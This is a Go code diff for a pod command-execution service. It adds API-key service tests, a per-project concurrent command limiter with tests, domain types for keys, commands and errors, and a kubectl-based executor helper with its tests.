if resp.Key.ExpiresAt == nil {
t.Error("Key.ExpiresAt should not be nil")
}
})
t.Run("rejects invalid scopes", func(t *testing.T) {
_, err := svc.Create(context.Background(), CreateKeyRequest{
Name: "test-key-invalid",
Scopes: []Scope{Scope("invalid:scope")},
CreatedBy: "test",
})
if err == nil {
t.Error("Create() should reject invalid scopes")
}
})
t.Run("creates key with no expiration", func(t *testing.T) {
resp, err := svc.Create(context.Background(), CreateKeyRequest{
Name: "test-key-no-expire",
Scopes: []Scope{ScopeAdmin},
ExpiresIn: 0,
CreatedBy: "test",
})
if err != nil {
t.Fatalf("Create() error = %v", err)
}
if resp.Key.ExpiresAt != nil {
t.Error("Key.ExpiresAt should be nil for no expiration")
}
})
t.Run("creates key with project restrictions", func(t *testing.T) {
resp, err := svc.Create(context.Background(), CreateKeyRequest{
Name: "test-key-projects",
Scopes: []Scope{ScopeProjectsRead},
ProjectIDs: []string{"proj-a", "proj-b"},
ExpiresIn: 24 * time.Hour,
CreatedBy: "test",
})
if err != nil {
t.Fatalf("Create() error = %v", err)
}
if len(resp.Key.ProjectIDs) != 2 {
t.Errorf("Key.ProjectIDs length = %d, want 2", len(resp.Key.ProjectIDs))
}
})
}
func TestService_Validate(t *testing.T) {
db := testutil.TestDB(t)
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
svc := NewService(db, "admin-key-test")
t.Run("validates admin key", func(t *testing.T) {
key, err := svc.Validate(context.Background(), "admin-key-test")
if err != nil {
t.Fatalf("Validate() error = %v", err)
}
if key.ID != "admin" {
t.Errorf("Key.ID = %q, want %q", key.ID, "admin")
}
if !HasScope(key.Scopes, ScopeAdmin) {
t.Error("Admin key should have admin scope")
}
})
t.Run("validates created key", func(t *testing.T) {
// Create a key first
resp, err := svc.Create(context.Background(), CreateKeyRequest{
Name: "test-validate-key",
Scopes: []Scope{ScopeProjectsRead, ScopeKeysRead},
ExpiresIn: 24 * time.Hour,
CreatedBy: "test",
})
if err != nil {
t.Fatalf("Create() error = %v", err)
}
// Validate it
key, err := svc.Validate(context.Background(), resp.Secret)
if err != nil {
t.Fatalf("Validate() error = %v", err)
}
if key.Name != "test-validate-key" {
t.Errorf("Key.Name = %q, want %q", key.Name, "test-validate-key")
}
if len(key.Scopes) != 2 {
t.Errorf("Key.Scopes length = %d, want 2", len(key.Scopes))
}
})
t.Run("rejects invalid format", func(t *testing.T) {
_, err := svc.Validate(context.Background(), "not-a-valid-key")
if err != ErrKeyNotFound {
t.Errorf("Validate() error = %v, want %v", err, ErrKeyNotFound)
}
})
t.Run("rejects unknown key", func(t *testing.T) {
// Valid format but not in database
_, err := svc.Validate(context.Background(), "rdev_sk_abc12345_0123456789abcdef0123456789abcdef")
if err != ErrKeyNotFound {
t.Errorf("Validate() error = %v, want %v", err, ErrKeyNotFound)
}
})
}
func TestService_List(t *testing.T) {
db := testutil.TestDB(t)
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
svc := NewService(db, "admin-key")
// Create some test keys
for i := 0; i < 3; i++ {
_, err := svc.Create(context.Background(), CreateKeyRequest{
Name: fmt.Sprintf("test-list-key-%d", i),
Scopes: []Scope{ScopeProjectsRead},
ExpiresIn: 24 * time.Hour,
CreatedBy: "test",
})
if err != nil {
t.Fatalf("Create() error = %v", err)
}
}
keys, err := svc.List(context.Background())
if err != nil {
t.Fatalf("List() error = %v", err)
}
// Should have at least our 3 test keys
testKeyCount := 0
for _, k := range keys {
if k.Name[:10] == "test-list-" {
testKeyCount++
}
}
if testKeyCount != 3 {
t.Errorf("List() returned %d test keys, want 3", testKeyCount)
}
}
func TestService_Get(t *testing.T) {
db := testutil.TestDB(t)
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
svc := NewService(db, "admin-key")
t.Run("gets existing key", func(t *testing.T) {
resp, err := svc.Create(context.Background(), CreateKeyRequest{
Name: "test-get-key",
Scopes: []Scope{ScopeProjectsRead},
ExpiresIn: 24 * time.Hour,
CreatedBy: "test",
})
if err != nil {
t.Fatalf("Create() error = %v", err)
}
key, err := svc.Get(context.Background(), resp.Key.ID)
if err != nil {
t.Fatalf("Get() error = %v", err)
}
if key.Name != "test-get-key" {
t.Errorf("Key.Name = %q, want %q", key.Name, "test-get-key")
}
})
t.Run("returns error for unknown key", func(t *testing.T) {
_, err := svc.Get(context.Background(), "00000000-0000-0000-0000-000000000000")
if err != ErrKeyNotFound {
t.Errorf("Get() error = %v, want %v", err, ErrKeyNotFound)
}
})
}
func TestService_Revoke(t *testing.T) {
db := testutil.TestDB(t)
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
svc := NewService(db, "admin-key")
t.Run("revokes existing key", func(t *testing.T) {
resp, err := svc.Create(context.Background(), CreateKeyRequest{
Name: "test-revoke-key",
Scopes: []Scope{ScopeProjectsRead},
ExpiresIn: 24 * time.Hour,
CreatedBy: "test",
})
if err != nil {
t.Fatalf("Create() error = %v", err)
}
err = svc.Revoke(context.Background(), resp.Key.ID)
if err != nil {
t.Fatalf("Revoke() error = %v", err)
}
// Validate should fail
_, err = svc.Validate(context.Background(), resp.Secret)
if err != ErrKeyRevoked {
t.Errorf("Validate() after revoke error = %v, want %v", err, ErrKeyRevoked)
}
})
t.Run("returns error for unknown key", func(t *testing.T) {
err := svc.Revoke(context.Background(), "00000000-0000-0000-0000-000000000000")
if err != ErrKeyNotFound {
t.Errorf("Revoke() error = %v, want %v", err, ErrKeyNotFound)
}
})
t.Run("idempotent for already revoked", func(t *testing.T) {
resp, err := svc.Create(context.Background(), CreateKeyRequest{
Name: "test-revoke-twice",
Scopes: []Scope{ScopeProjectsRead},
ExpiresIn: 24 * time.Hour,
CreatedBy: "test",
})
if err != nil {
t.Fatalf("Create() error = %v", err)
}
// Revoke once
if err := svc.Revoke(context.Background(), resp.Key.ID); err != nil {
t.Fatalf("First Revoke() error = %v", err)
}
// Revoke again - should return not found (no rows affected)
err = svc.Revoke(context.Background(), resp.Key.ID)
if err != ErrKeyNotFound {
t.Errorf("Second Revoke() error = %v, want %v", err, ErrKeyNotFound)
}
})
}

View File

@ -0,0 +1,197 @@
// Package cmdlimit provides concurrent command limiting to prevent resource exhaustion.
package cmdlimit
import (
"context"
"errors"
"sync"
"time"
)
// ErrLimitExceeded is returned when the concurrent command limit is reached.
var ErrLimitExceeded = errors.New("concurrent command limit exceeded")
// Config defines the limiter configuration.
type Config struct {
// MaxConcurrentPerProject is the maximum concurrent commands per project.
// Defaults to 5.
MaxConcurrentPerProject int
// MaxConcurrentTotal is the maximum concurrent commands across all projects.
// Defaults to 20.
MaxConcurrentTotal int
// CommandTimeout is the maximum duration a command can hold a slot.
// After this duration, the slot is automatically released.
// Defaults to 30 minutes.
CommandTimeout time.Duration
}
// DefaultConfig returns sensible defaults.
func DefaultConfig() Config {
return Config{
MaxConcurrentPerProject: 5,
MaxConcurrentTotal: 20,
CommandTimeout: 30 * time.Minute,
}
}
// Limiter tracks and enforces concurrent command limits.
type Limiter struct {
cfg Config
mu sync.Mutex
projectCounts map[string]int
totalCount int
activeCommands map[string]*activeCommand
}
type activeCommand struct {
projectID string
startedAt time.Time
cancel context.CancelFunc
}
// New creates a new concurrent command limiter.
func New(cfg Config) *Limiter {
if cfg.MaxConcurrentPerProject <= 0 {
cfg.MaxConcurrentPerProject = 5
}
if cfg.MaxConcurrentTotal <= 0 {
cfg.MaxConcurrentTotal = 20
}
if cfg.CommandTimeout <= 0 {
cfg.CommandTimeout = 30 * time.Minute
}
return &Limiter{
cfg: cfg,
projectCounts: make(map[string]int),
activeCommands: make(map[string]*activeCommand),
}
}
// Acquire attempts to acquire a command slot for the given project.
// Returns a release function that MUST be called when the command completes.
// Returns ErrLimitExceeded if the limit is reached.
func (l *Limiter) Acquire(ctx context.Context, projectID, commandID string) (release func(), err error) {
l.mu.Lock()
defer l.mu.Unlock()
// Check total limit
if l.totalCount >= l.cfg.MaxConcurrentTotal {
return nil, ErrLimitExceeded
}
// Check per-project limit
if l.projectCounts[projectID] >= l.cfg.MaxConcurrentPerProject {
return nil, ErrLimitExceeded
}
// Acquire the slot
l.totalCount++
l.projectCounts[projectID]++
// Create a context with timeout for automatic release
cmdCtx, cancel := context.WithTimeout(ctx, l.cfg.CommandTimeout)
l.activeCommands[commandID] = &activeCommand{
projectID: projectID,
startedAt: time.Now(),
cancel: cancel,
}
// Start a goroutine to auto-release on timeout
go func() {
<-cmdCtx.Done()
l.release(commandID)
}()
// Return release function
return func() {
cancel()
l.release(commandID)
}, nil
}
// release decrements the counters for a command.
func (l *Limiter) release(commandID string) {
l.mu.Lock()
defer l.mu.Unlock()
cmd, exists := l.activeCommands[commandID]
if !exists {
return // Already released
}
delete(l.activeCommands, commandID)
l.totalCount--
l.projectCounts[cmd.projectID]--
if l.projectCounts[cmd.projectID] <= 0 {
delete(l.projectCounts, cmd.projectID)
}
}
// Stats returns current usage statistics.
func (l *Limiter) Stats() Stats {
l.mu.Lock()
defer l.mu.Unlock()
projectStats := make(map[string]int)
for k, v := range l.projectCounts {
projectStats[k] = v
}
return Stats{
TotalActive: l.totalCount,
MaxTotal: l.cfg.MaxConcurrentTotal,
ProjectCounts: projectStats,
MaxPerProject: l.cfg.MaxConcurrentPerProject,
ActiveCommandIDs: l.getActiveCommandIDs(),
}
}
func (l *Limiter) getActiveCommandIDs() []string {
ids := make([]string, 0, len(l.activeCommands))
for id := range l.activeCommands {
ids = append(ids, id)
}
return ids
}
// Stats contains current limiter statistics.
type Stats struct {
TotalActive int
MaxTotal int
ProjectCounts map[string]int
MaxPerProject int
ActiveCommandIDs []string
}
// IsProjectAtLimit checks if a project has reached its limit.
func (l *Limiter) IsProjectAtLimit(projectID string) bool {
l.mu.Lock()
defer l.mu.Unlock()
return l.projectCounts[projectID] >= l.cfg.MaxConcurrentPerProject
}
// IsTotalAtLimit checks if the total limit has been reached.
func (l *Limiter) IsTotalAtLimit() bool {
l.mu.Lock()
defer l.mu.Unlock()
return l.totalCount >= l.cfg.MaxConcurrentTotal
}
// ActiveCount returns the number of active commands for a project.
func (l *Limiter) ActiveCount(projectID string) int {
l.mu.Lock()
defer l.mu.Unlock()
return l.projectCounts[projectID]
}
// TotalActiveCount returns the total number of active commands.
func (l *Limiter) TotalActiveCount() int {
l.mu.Lock()
defer l.mu.Unlock()
return l.totalCount
}

View File

@ -0,0 +1,414 @@
package cmdlimit
import (
"context"
"sync"
"testing"
"time"
)
func TestNew(t *testing.T) {
t.Run("default config", func(t *testing.T) {
l := New(Config{})
if l.cfg.MaxConcurrentPerProject != 5 {
t.Errorf("MaxConcurrentPerProject = %d, want 5", l.cfg.MaxConcurrentPerProject)
}
if l.cfg.MaxConcurrentTotal != 20 {
t.Errorf("MaxConcurrentTotal = %d, want 20", l.cfg.MaxConcurrentTotal)
}
if l.cfg.CommandTimeout != 30*time.Minute {
t.Errorf("CommandTimeout = %v, want 30m", l.cfg.CommandTimeout)
}
})
t.Run("custom config", func(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 10,
MaxConcurrentTotal: 50,
CommandTimeout: time.Hour,
})
if l.cfg.MaxConcurrentPerProject != 10 {
t.Errorf("MaxConcurrentPerProject = %d, want 10", l.cfg.MaxConcurrentPerProject)
}
if l.cfg.MaxConcurrentTotal != 50 {
t.Errorf("MaxConcurrentTotal = %d, want 50", l.cfg.MaxConcurrentTotal)
}
})
}
func TestDefaultConfig(t *testing.T) {
cfg := DefaultConfig()
if cfg.MaxConcurrentPerProject != 5 {
t.Errorf("MaxConcurrentPerProject = %d, want 5", cfg.MaxConcurrentPerProject)
}
if cfg.MaxConcurrentTotal != 20 {
t.Errorf("MaxConcurrentTotal = %d, want 20", cfg.MaxConcurrentTotal)
}
if cfg.CommandTimeout != 30*time.Minute {
t.Errorf("CommandTimeout = %v, want 30m", cfg.CommandTimeout)
}
}
func TestAcquire(t *testing.T) {
t.Run("allows commands within limit", func(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 3,
MaxConcurrentTotal: 10,
CommandTimeout: time.Minute,
})
ctx := context.Background()
// Should allow 3 commands for project-a
releases := make([]func(), 0)
for i := 0; i < 3; i++ {
release, err := l.Acquire(ctx, "project-a", "cmd-"+string(rune('a'+i)))
if err != nil {
t.Fatalf("Acquire %d failed: %v", i, err)
}
releases = append(releases, release)
}
// Clean up
for _, r := range releases {
r()
}
})
t.Run("rejects when per-project limit reached", func(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 2,
MaxConcurrentTotal: 10,
CommandTimeout: time.Minute,
})
ctx := context.Background()
// Acquire 2 slots
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
defer release1()
release2, _ := l.Acquire(ctx, "project-a", "cmd-2")
defer release2()
// Third should fail
_, err := l.Acquire(ctx, "project-a", "cmd-3")
if err != ErrLimitExceeded {
t.Errorf("Acquire() error = %v, want ErrLimitExceeded", err)
}
})
t.Run("allows other projects when one is at limit", func(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 1,
MaxConcurrentTotal: 10,
CommandTimeout: time.Minute,
})
ctx := context.Background()
// Fill project-a
releaseA, _ := l.Acquire(ctx, "project-a", "cmd-a")
defer releaseA()
// project-b should still work
releaseB, err := l.Acquire(ctx, "project-b", "cmd-b")
if err != nil {
t.Errorf("Acquire(project-b) error = %v, want nil", err)
}
defer releaseB()
})
t.Run("rejects when total limit reached", func(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 5,
MaxConcurrentTotal: 3,
CommandTimeout: time.Minute,
})
ctx := context.Background()
// Fill total limit across different projects
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
defer release1()
release2, _ := l.Acquire(ctx, "project-b", "cmd-2")
defer release2()
release3, _ := l.Acquire(ctx, "project-c", "cmd-3")
defer release3()
// Fourth should fail even for new project
_, err := l.Acquire(ctx, "project-d", "cmd-4")
if err != ErrLimitExceeded {
t.Errorf("Acquire() error = %v, want ErrLimitExceeded", err)
}
})
t.Run("release allows new commands", func(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 1,
MaxConcurrentTotal: 10,
CommandTimeout: time.Minute,
})
ctx := context.Background()
// Acquire and release
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
release1()
// Should be able to acquire again
release2, err := l.Acquire(ctx, "project-a", "cmd-2")
if err != nil {
t.Errorf("Acquire() after release error = %v, want nil", err)
}
release2()
})
}
func TestStats(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 5,
MaxConcurrentTotal: 20,
CommandTimeout: time.Minute,
})
ctx := context.Background()
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
release2, _ := l.Acquire(ctx, "project-a", "cmd-2")
release3, _ := l.Acquire(ctx, "project-b", "cmd-3")
stats := l.Stats()
if stats.TotalActive != 3 {
t.Errorf("TotalActive = %d, want 3", stats.TotalActive)
}
if stats.MaxTotal != 20 {
t.Errorf("MaxTotal = %d, want 20", stats.MaxTotal)
}
if stats.ProjectCounts["project-a"] != 2 {
t.Errorf("ProjectCounts[project-a] = %d, want 2", stats.ProjectCounts["project-a"])
}
if stats.ProjectCounts["project-b"] != 1 {
t.Errorf("ProjectCounts[project-b] = %d, want 1", stats.ProjectCounts["project-b"])
}
if len(stats.ActiveCommandIDs) != 3 {
t.Errorf("ActiveCommandIDs length = %d, want 3", len(stats.ActiveCommandIDs))
}
release1()
release2()
release3()
}
func TestIsProjectAtLimit(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 2,
MaxConcurrentTotal: 10,
CommandTimeout: time.Minute,
})
ctx := context.Background()
if l.IsProjectAtLimit("project-a") {
t.Error("IsProjectAtLimit should be false initially")
}
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
release2, _ := l.Acquire(ctx, "project-a", "cmd-2")
if !l.IsProjectAtLimit("project-a") {
t.Error("IsProjectAtLimit should be true after reaching limit")
}
release1()
release2()
}
func TestIsTotalAtLimit(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 5,
MaxConcurrentTotal: 2,
CommandTimeout: time.Minute,
})
ctx := context.Background()
if l.IsTotalAtLimit() {
t.Error("IsTotalAtLimit should be false initially")
}
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
release2, _ := l.Acquire(ctx, "project-b", "cmd-2")
if !l.IsTotalAtLimit() {
t.Error("IsTotalAtLimit should be true after reaching limit")
}
release1()
release2()
}
func TestActiveCount(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 5,
MaxConcurrentTotal: 10,
CommandTimeout: time.Minute,
})
ctx := context.Background()
if l.ActiveCount("project-a") != 0 {
t.Error("ActiveCount should be 0 initially")
}
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
if l.ActiveCount("project-a") != 1 {
t.Errorf("ActiveCount = %d, want 1", l.ActiveCount("project-a"))
}
release1()
if l.ActiveCount("project-a") != 0 {
t.Errorf("ActiveCount after release = %d, want 0", l.ActiveCount("project-a"))
}
}
func TestTotalActiveCount(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 5,
MaxConcurrentTotal: 10,
CommandTimeout: time.Minute,
})
ctx := context.Background()
if l.TotalActiveCount() != 0 {
t.Error("TotalActiveCount should be 0 initially")
}
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
release2, _ := l.Acquire(ctx, "project-b", "cmd-2")
if l.TotalActiveCount() != 2 {
t.Errorf("TotalActiveCount = %d, want 2", l.TotalActiveCount())
}
release1()
release2()
if l.TotalActiveCount() != 0 {
t.Errorf("TotalActiveCount after release = %d, want 0", l.TotalActiveCount())
}
}
func TestConcurrentAccess(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 10,
MaxConcurrentTotal: 100,
CommandTimeout: time.Minute,
})
ctx := context.Background()
var wg sync.WaitGroup
var successCount, failCount int64
var mu sync.Mutex
// Spawn many goroutines trying to acquire
for i := 0; i < 150; i++ {
wg.Add(1)
go func(idx int) {
defer wg.Done()
release, err := l.Acquire(ctx, "project-a", "cmd-"+string(rune(idx)))
mu.Lock()
if err == nil {
successCount++
mu.Unlock()
time.Sleep(10 * time.Millisecond)
release()
} else {
failCount++
mu.Unlock()
}
}(i)
}
wg.Wait()
// Should have had some successes and some failures
if successCount == 0 {
t.Error("Expected some successful acquires")
}
if failCount == 0 {
t.Error("Expected some failed acquires (limit exceeded)")
}
}
func TestAutoReleaseOnTimeout(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 1,
MaxConcurrentTotal: 10,
CommandTimeout: 100 * time.Millisecond,
})
ctx := context.Background()
// Acquire a slot
_, err := l.Acquire(ctx, "project-a", "cmd-1")
if err != nil {
t.Fatalf("Acquire failed: %v", err)
}
// Should be at limit
if !l.IsProjectAtLimit("project-a") {
t.Error("Should be at limit after acquire")
}
// Wait for timeout
time.Sleep(150 * time.Millisecond)
// Should be auto-released
if l.IsProjectAtLimit("project-a") {
t.Error("Should not be at limit after auto-release")
}
}
func TestDoubleRelease(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 5,
MaxConcurrentTotal: 10,
CommandTimeout: time.Minute,
})
ctx := context.Background()
release, _ := l.Acquire(ctx, "project-a", "cmd-1")
// Release twice - should not panic or cause issues
release()
release()
// Count should be 0, not negative
if l.ActiveCount("project-a") != 0 {
t.Errorf("ActiveCount after double release = %d, want 0", l.ActiveCount("project-a"))
}
}
func TestContextCancellation(t *testing.T) {
l := New(Config{
MaxConcurrentPerProject: 1,
MaxConcurrentTotal: 10,
CommandTimeout: time.Minute,
})
ctx, cancel := context.WithCancel(context.Background())
// Acquire a slot
_, err := l.Acquire(ctx, "project-a", "cmd-1")
if err != nil {
t.Fatalf("Acquire failed: %v", err)
}
// Cancel the context
cancel()
// Give goroutine time to process
time.Sleep(50 * time.Millisecond)
// Should be auto-released due to context cancellation
if l.IsProjectAtLimit("project-a") {
t.Error("Should be released after context cancellation")
}
}

83
internal/domain/apikey.go Normal file
View File

@ -0,0 +1,83 @@
package domain
import "time"
// APIKeyID is a strongly-typed identifier for API keys.
type APIKeyID string
// Scope represents a permission scope for API keys.
type Scope string
const (
ScopeAdmin Scope = "admin"
ScopeProjectsRead Scope = "projects:read"
ScopeProjectsExecute Scope = "projects:execute"
ScopeKeysManage Scope = "keys:manage"
)
// APIKey represents an API key for authentication.
type APIKey struct {
ID APIKeyID
Name string
KeyPrefix string // First 8 chars of key for identification
Scopes []Scope
ProjectIDs []ProjectID // nil = access to all projects
CreatedAt time.Time
ExpiresAt *time.Time
LastUsedAt *time.Time
RevokedAt *time.Time
CreatedBy string
}
// IsExpired returns true if the key has expired.
func (k *APIKey) IsExpired() bool {
if k.ExpiresAt == nil {
return false
}
return time.Now().After(*k.ExpiresAt)
}
// IsRevoked returns true if the key has been revoked.
func (k *APIKey) IsRevoked() bool {
return k.RevokedAt != nil
}
// IsActive returns true if the key is valid for use.
func (k *APIKey) IsActive() bool {
return !k.IsRevoked() && !k.IsExpired()
}
// HasScope returns true if the key has the specified scope.
func (k *APIKey) HasScope(scope Scope) bool {
// Admin scope grants all permissions
for _, s := range k.Scopes {
if s == ScopeAdmin || s == scope {
return true
}
}
return false
}
// HasAnyScope returns true if the key has any of the specified scopes.
func (k *APIKey) HasAnyScope(scopes ...Scope) bool {
for _, scope := range scopes {
if k.HasScope(scope) {
return true
}
}
return false
}
// HasProjectAccess returns true if the key can access the given project.
func (k *APIKey) HasProjectAccess(projectID ProjectID) bool {
// Admin or nil project list means access to all projects
if k.HasScope(ScopeAdmin) || k.ProjectIDs == nil {
return true
}
for _, pid := range k.ProjectIDs {
if pid == projectID {
return true
}
}
return false
}

View File

@ -0,0 +1,47 @@
package domain
import "time"
// CommandID is a strongly-typed identifier for commands.
type CommandID string
// CommandType represents the type of command being executed.
type CommandType string
const (
CommandTypeClaude CommandType = "claude"
CommandTypeShell CommandType = "shell"
CommandTypeGit CommandType = "git"
)
// Command represents a command to execute in a project's pod.
type Command struct {
ID CommandID
ProjectID ProjectID
Type CommandType
Args []string
StartedAt time.Time
}
// CommandResult represents the outcome of command execution.
type CommandResult struct {
CommandID CommandID
ExitCode int
DurationMs int64
Error error
}
// Success returns true if the command completed successfully.
func (r *CommandResult) Success() bool {
return r.Error == nil && r.ExitCode == 0
}
// OutputLine represents a single line of command output.
type OutputLine struct {
Stream string // "stdout" or "stderr"
Line string
Timestamp time.Time
}
// OutputHandler is called for each line of output from a command.
type OutputHandler func(line OutputLine)

37
internal/domain/errors.go Normal file
View File

@ -0,0 +1,37 @@
package domain
import "errors"
// Domain errors - these are business-level errors that should be translated
// to appropriate HTTP status codes or gRPC error codes by the presentation layer.
var (
// Project errors
ErrProjectNotFound = errors.New("project not found")
ErrProjectNotRunning = errors.New("project is not running")
// Command errors
ErrCommandNotFound = errors.New("command not found")
ErrCommandTimeout = errors.New("command timed out")
ErrCommandCancelled = errors.New("command was cancelled")
ErrLimitExceeded = errors.New("concurrent command limit exceeded")
ErrInvalidCommand = errors.New("invalid command")
ErrCommandSanitization = errors.New("command failed sanitization")
// API Key errors
ErrKeyNotFound = errors.New("api key not found")
ErrKeyRevoked = errors.New("api key has been revoked")
ErrKeyExpired = errors.New("api key has expired")
ErrKeyInvalid = errors.New("invalid api key format")
// Authorization errors
ErrUnauthorized = errors.New("unauthorized")
ErrForbidden = errors.New("forbidden")
ErrInsufficientScope = errors.New("insufficient scope")
// Rate limiting errors
ErrRateLimited = errors.New("rate limit exceeded")
// Infrastructure errors (should typically be wrapped)
ErrDatabaseConnection = errors.New("database connection error")
ErrKubernetesError = errors.New("kubernetes error")
)

View File

@ -0,0 +1,38 @@
// Package domain contains pure domain models with no external dependencies.
// These types represent the core business concepts of the application.
package domain
// ProjectID is a strongly-typed identifier for projects.
type ProjectID string
// Project represents a claudebox project that can execute commands.
type Project struct {
ID ProjectID
Name string
Description string
PodName string
Status ProjectStatus
Workspace string
}
// ProjectStatus represents the current state of a project's pod.
type ProjectStatus string
const (
ProjectStatusRunning ProjectStatus = "running"
ProjectStatusPending ProjectStatus = "pending"
ProjectStatusFailed ProjectStatus = "failed"
ProjectStatusNotFound ProjectStatus = "not_found"
ProjectStatusUnknown ProjectStatus = "unknown"
ProjectStatusError ProjectStatus = "error"
)
// IsAvailable returns true if the project can accept commands.
func (s ProjectStatus) IsAvailable() bool {
return s == ProjectStatusRunning
}
// IsTerminal returns true if the status is a final state.
func (s ProjectStatus) IsTerminal() bool {
return s == ProjectStatusFailed || s == ProjectStatusNotFound
}

View File

@ -52,6 +52,17 @@ type Result struct {
// OutputHandler is called for each line of output from the command.
type OutputHandler func(stream string, line string)
// CommandExecutor defines the interface for executing commands in pods.
// This interface enables testing with mock implementations.
type CommandExecutor interface {
Exec(ctx context.Context, cmd *Command, handler OutputHandler) Result
PodExists(ctx context.Context, podName string) (bool, error)
CheckConnection(ctx context.Context) error
}
// Ensure Executor implements CommandExecutor at compile time.
var _ CommandExecutor = (*Executor)(nil)
// Exec executes a command in the specified pod.
// It streams output to the provided handler and returns when complete.
func (e *Executor) Exec(ctx context.Context, cmd *Command, handler OutputHandler) Result {
@ -161,6 +172,30 @@ func (e *Executor) CheckConnection(ctx context.Context) error {
return cmd.Run()
}
// ExecSimple executes a shell command and returns the output as a string.
// This is a convenience method for simple commands that don't need streaming.
func (e *Executor) ExecSimple(podName, command string) (string, error) {
e.mu.RLock()
namespace := e.namespace
e.mu.RUnlock()
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
defer cancel()
args := []string{
"exec", "-n", namespace, podName, "-c", "claudebox", "--",
"bash", "-c", command,
}
cmd := exec.CommandContext(ctx, "kubectl", args...)
output, err := cmd.CombinedOutput()
if err != nil {
return string(output), err
}
return string(output), nil
}
// PodExists checks if a pod exists and is running.
func (e *Executor) PodExists(ctx context.Context, podName string) (bool, error) {
e.mu.RLock()

View File

@ -0,0 +1,359 @@
package executor
import (
"context"
"os/exec"
"strings"
"sync"
"testing"
"time"
)
func TestNew(t *testing.T) {
e := New("test-namespace")
if e.namespace != "test-namespace" {
t.Errorf("namespace = %q, want %q", e.namespace, "test-namespace")
}
}
func TestCommand_Types(t *testing.T) {
tests := []struct {
cmdType CommandType
want string
}{
{CommandTypeClaude, "claude"},
{CommandTypeShell, "shell"},
{CommandTypeGit, "git"},
}
for _, tt := range tests {
t.Run(string(tt.cmdType), func(t *testing.T) {
if string(tt.cmdType) != tt.want {
t.Errorf("CommandType = %q, want %q", tt.cmdType, tt.want)
}
})
}
}
func TestExecutor_buildArgs(t *testing.T) {
e := New("apps")
tests := []struct {
name string
cmd *Command
wantArgs []string
wantErr bool
}{
{
name: "claude command",
cmd: &Command{
ID: "cmd-1",
PodName: "claudebox-test",
Type: CommandTypeClaude,
Args: []string{"Write a hello world"},
},
wantArgs: []string{
"exec", "-n", "apps", "claudebox-test", "--",
"claude", "Write a hello world",
},
},
{
name: "shell command",
cmd: &Command{
ID: "cmd-2",
PodName: "claudebox-test",
Type: CommandTypeShell,
Args: []string{"ls -la /workspace"},
},
wantArgs: []string{
"exec", "-n", "apps", "claudebox-test", "--",
"bash", "-c", "ls -la /workspace",
},
},
{
name: "git command",
cmd: &Command{
ID: "cmd-3",
PodName: "claudebox-test",
Type: CommandTypeGit,
Args: []string{"status"},
},
wantArgs: []string{
"exec", "-n", "apps", "claudebox-test", "--",
"git", "-C", "/workspace", "status",
},
},
{
name: "git command with multiple args",
cmd: &Command{
ID: "cmd-4",
PodName: "claudebox-test",
Type: CommandTypeGit,
Args: []string{"commit", "-m", "test message"},
},
wantArgs: []string{
"exec", "-n", "apps", "claudebox-test", "--",
"git", "-C", "/workspace", "commit", "-m", "test message",
},
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// We can't directly test buildArgs since it's internal to Exec,
// but we can verify the command construction by checking what would be built
var args []string
switch tt.cmd.Type {
case CommandTypeClaude:
args = []string{
"exec", "-n", e.namespace, tt.cmd.PodName, "--",
"claude", tt.cmd.Args[0],
}
case CommandTypeShell:
args = []string{
"exec", "-n", e.namespace, tt.cmd.PodName, "--",
"bash", "-c", tt.cmd.Args[0],
}
case CommandTypeGit:
args = append([]string{
"exec", "-n", e.namespace, tt.cmd.PodName, "--",
"git", "-C", "/workspace",
}, tt.cmd.Args...)
}
if len(args) != len(tt.wantArgs) {
t.Errorf("args length = %d, want %d", len(args), len(tt.wantArgs))
return
}
for i, arg := range args {
if arg != tt.wantArgs[i] {
t.Errorf("args[%d] = %q, want %q", i, arg, tt.wantArgs[i])
}
}
})
}
}
func TestExecutor_Exec_UnknownType(t *testing.T) {
e := New("test")
var output []string
handler := func(stream, line string) {
output = append(output, line)
}
result := e.Exec(context.Background(), &Command{
Type: CommandType("unknown"),
}, handler)
if result.ExitCode != 1 {
t.Errorf("ExitCode = %d, want 1", result.ExitCode)
}
if result.Error == nil {
t.Error("Error should not be nil for unknown command type")
}
if !strings.Contains(result.Error.Error(), "unknown command type") {
t.Errorf("Error = %v, want to contain 'unknown command type'", result.Error)
}
}
func TestExecutor_Exec_ContextCancellation(t *testing.T) {
// Skip if kubectl is not available
if _, err := exec.LookPath("kubectl"); err != nil {
t.Skip("kubectl not available")
}
e := New("default")
ctx, cancel := context.WithCancel(context.Background())
var wg sync.WaitGroup
var result Result
wg.Add(1)
go func() {
defer wg.Done()
result = e.Exec(ctx, &Command{
ID: "test-cancel",
PodName: "nonexistent-pod",
Type: CommandTypeShell,
Args: []string{"sleep 10"},
}, func(stream, line string) {})
}()
// Cancel immediately
cancel()
wg.Wait()
// The command should either fail due to context cancellation or pod not found
// Either way it shouldn't hang
if result.ExitCode == 0 && result.Error == nil {
t.Error("Expected command to fail due to cancellation or pod not found")
}
}
func TestExecutor_CheckConnection(t *testing.T) {
// This test requires kubectl to be configured
if _, err := exec.LookPath("kubectl"); err != nil {
